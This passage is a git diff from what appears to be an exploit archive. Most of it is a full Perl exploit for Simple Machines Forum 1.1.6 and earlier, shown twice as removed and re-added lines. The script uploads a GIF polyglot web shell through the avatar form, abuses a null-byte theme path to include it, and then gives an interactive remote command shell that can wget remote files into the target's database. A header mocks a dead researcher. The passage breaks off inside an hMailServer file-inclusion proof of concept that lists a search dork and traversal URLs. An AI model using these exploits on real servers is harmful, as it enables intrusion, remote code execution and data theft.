- chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00); $shell .= <<'EXIF';
-
-EXIF
- $shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
- chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
- chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
- chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
- chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
- chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
- chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
- chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
- chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
- chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
- chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
- chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
- chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
- chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
- chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
- chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
- chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
- chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
- chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
- chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
- chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
- chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
- chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
- chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
- chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
- chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
- chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
- chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
- chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
- chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
- chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
- chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
- chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
- chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
- chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
- chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
- chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
- chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
- chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
- chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
- chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
- chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
- chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
- chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
- chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
- chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
- chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
- chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
- chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
- chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
- chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
- chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
- chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
- chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
- chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
- chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
- chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
- chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
- chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
- chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
- chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
- chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
- chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
- chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
- chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
- chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
- chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
- chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
- chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
- chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
- chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
- chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
- chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
- chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
- chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
- chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
- chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
- chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
- chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
- chr(0x04).chr(0x00).chr(0x3b).chr(0x00);
-
-## Logging in
-my $ret = $ua->post("$parms{s}/index.php?action=login2",
- [
- user => $parms{u},
- passwrd => $parms{p},
- cookielength => -1
- ]);
-
-## Getting id, sid and checking to see if we're logged on
-$ret = $ua->get("$parms{s}/index.php?action=profile");
-
-die "[!!] Wrong username/password\n"
- unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;
-
-die "[!!] Error getting session id\n"
- unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;
-
-die "[!!] Error getting id\n"
- unless my($id) = $ret->as_string =~ /u=(\d+);/;
-
-print "[ii] Session ID = $sid\n".
- "[ii] User Id = $id\n" if $parms{d};
-
-## Checking for shell
-$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");
-
-&shell
- if $ret->as_string =~ /expl0ited/;
-
-$ret = $ua->request(
- POST "$parms{s}/index.php?action=profile2",
- Content_Type => 'multipart/form-data',
- Content =>
- [
- avatar_choice => "upload",
- sc => $sid,
- userID => $id,
- sa => "forumProfile",
- attachment =>
- [
- undef,
- "expl0ited.gif",
- Content => $shell,
- "Content-Type" => "image/gif"
- ]
- ]);
-
-## Updating Settings.php
-$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");
-
-print "[ii] Uploaded a shell...\n"
- if $parms{d};
-
-shell();
-
-## lulz @ this shit.
-sub shell {
- my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
- $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );
- ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;
-
- die "[!!] magic_quotes is turned on\n"
- if (not defined $os or not defined $sh or $1 eq $id);
-
- $sh = $sh ? "php" : "cmd";
- $os = $os =~ /win/i ? "win32" : "unix";
-
- do {
- print "[$sh\@$os]\$ ";
- $cmd = chomp (my $cmd = );
-
-
- exit
- unless $cmd !~ /^exit$/i;
-
- if( ($file) = $cmd =~ /^savefile (.*?) / ) {
- $cmd =~ s/savefile $1 //;
- } else { undef $file; }
-
- if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {
- ($base) = $full =~ /\/(.*?)$/;
- $cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
- }
-
- $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);
- $ret->as_string =~ /---1243---(.*?)---3421---/s;
- print "$1\n";
-
- if( defined $file ) {
- open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
- print FILE "Command Executed: $cmd\n".
- "Host: $parms{s}\n$1\n";
- close FILE;
- }
- } while( $cmd !~ /^exit$/i );
-
- exit;
-}
-
-# milw0rm.com [2008-11-05]
+#!/usr/bin/perl
+#
+# @title: Simple Machines Forum Code Execution
+# @versn: * <= 1.1.6
+# @authr: ~elmysterio ( a.k.a us )
+# @stats: DROPPED!!!!!!!
+# @descp: In loving memory of the rare bone marrow disease that killed rgod.
+# We can't thank you enough for killing a bug killer.
+# @bug : Sources/QueryString.php & Sources/Themes.php w/ magic_quotes == Off
+# @gr33t: m0rt's failure, it never stops.
+#
+# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
+# -s http://localhost/audit/smf116 -u regular -p test -d
+# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
+# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
+# [ii] User Id = 2
+# [ii] Uploaded a shell...
+# [cmd@win32]$ ver
+#
+# Microsoft Windows XP [Version 5.1.2600]
+#
+# [cmd@win32]$
+#
+# FOR LULZ PURPOSE ONLY!!
+#
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+use Getopt::Long qw(:config no_ignore_case);
+
+print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";
+
+my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
+my %parms = ( s => "",
+ d => 0,
+ x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
+ u => "Gl0ria!!!",
+ p => "gl0ria\@herb3st" );
+
+GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";
+
+if( !$parms{s} ) {
+ die <
+ [-s] Site -> http://site.com/forums
+ [-x] Proxy -> localhost:8118
+ [-u] Username -> Gl0ria!!!
+ [-p] Password -> gl0ria\@herb3st
+ [-d] Debug
+HELP
+}
+
+my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
+ chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
+ chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
+ chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+ chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
+ chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
+ chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
+ chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00); $shell .= <<'EXIF';
+
+EXIF
+ $shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
+ chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
+ chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
+ chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
+ chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
+ chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+ chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
+ chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
+ chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
+ chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
+ chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
+ chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+ chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
+ chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
+ chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
+ chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
+ chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
+ chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
+ chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
+ chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
+ chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
+ chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
+ chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
+ chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
+ chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
+ chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
+ chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
+ chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
+ chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
+ chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
+ chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+ chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
+ chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
+ chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
+ chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
+ chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
+ chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
+ chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
+ chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
+ chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
+ chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
+ chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+ chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
+ chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
+ chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
+ chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
+ chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
+ chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
+ chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
+ chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
+ chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
+ chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
+ chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
+ chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
+ chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
+ chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
+ chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
+ chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
+ chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
+ chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
+ chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
+ chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
+ chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
+ chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
+ chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
+ chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
+ chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
+ chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
+ chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
+ chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
+ chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
+ chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
+ chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
+ chr(0x04).chr(0x00).chr(0x3b).chr(0x00);
+
+## Logging in
+my $ret = $ua->post("$parms{s}/index.php?action=login2",
+ [
+ user => $parms{u},
+ passwrd => $parms{p},
+ cookielength => -1
+ ]);
+
+## Getting id, sid and checking to see if we're logged on
+$ret = $ua->get("$parms{s}/index.php?action=profile");
+
+die "[!!] Wrong username/password\n"
+ unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;
+
+die "[!!] 
Error getting session id\n"
+ unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;
+
+die "[!!] Error getting id\n"
+ unless my($id) = $ret->as_string =~ /u=(\d+);/;
+
+print "[ii] Session ID = $sid\n".
+ "[ii] User Id = $id\n" if $parms{d};
+
+## Checking for shell
+$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");
+
+&shell
+ if $ret->as_string =~ /expl0ited/;
+
+$ret = $ua->request(
+ POST "$parms{s}/index.php?action=profile2",
+ Content_Type => 'multipart/form-data',
+ Content =>
+ [
+ avatar_choice => "upload",
+ sc => $sid,
+ userID => $id,
+ sa => "forumProfile",
+ attachment =>
+ [
+ undef,
+ "expl0ited.gif",
+ Content => $shell,
+ "Content-Type" => "image/gif"
+ ]
+ ]);
+
+## Updating Settings.php
+$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");
+
+print "[ii] Uploaded a shell...\n"
+ if $parms{d};
+
+shell();
+
+## lulz @ this shit.
+sub shell {
+ my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
+ $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );
+ ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;
+
+ die "[!!] magic_quotes is turned on\n"
+ if (not defined $os or not defined $sh or $1 eq $id);
+
+ $sh = $sh ? "php" : "cmd";
+ $os = $os =~ /win/i ? "win32" : "unix";
+
+ do {
+ print "[$sh\@$os]\$ ";
+ $cmd = chomp (my $cmd = );
+
+
+ exit
+ unless $cmd !~ /^exit$/i;
+
+ if( ($file) = $cmd =~ /^savefile (.*?) / ) {
+ $cmd =~ s/savefile $1 //;
+ } else { undef $file; }
+
+ if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) 
(.*?)$/ ) {
+ ($base) = $full =~ /\/(.*?)$/;
+ $cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
+ }
+
+ $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);
+ $ret->as_string =~ /---1243---(.*?)---3421---/s;
+ print "$1\n";
+
+ if( defined $file ) {
+ open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
+ print FILE "Command Executed: $cmd\n".
+ "Host: $parms{s}\n$1\n";
+ close FILE;
+ }
+ } while( $cmd !~ /^exit$/i );
+
+ exit;
+}
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7012.txt b/platforms/php/webapps/7012.txt
index e2343a2c0..3e113f1ca 100755
--- a/platforms/php/webapps/7012.txt
+++ b/platforms/php/webapps/7012.txt
@@ -1,132 +1,132 @@ -hMAilServer 4.4.2 (PHPWebAdmin) local & remote file inclusion poc -by Nine:Situations:Group::strawdog --------------------------------------------------------------------------------- - -our site: http://retrogod.altervista.org - -software site: http://www.hmailserver.com/ -description: http://en.wikipedia.org/wiki/HMailServer --------------------------------------------------------------------------------- -google dork: "PHPWebAdmin for hMailServer" intitle:PHPWebAdmin -site:hmailserver.com -dork - -poc: - -regardless of register_globals & magic_quotes_gpc: -http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../../boot.ini%00 -http://hostname/path_to_webadmin/index.php?page=background/../../Bin/hMailServer.INI%00 -http://hostname/path_to_webadmin/index.php?index.php?page=background/../../MySQL/my.ini%00 -http://hostname/path_to_webadmin/index.php?index.php?page=background/../../../../../../../../../Program+Files/hmailserver/Bin/hmailserver.ini%00 - -with register_globals = on: -(prepare a 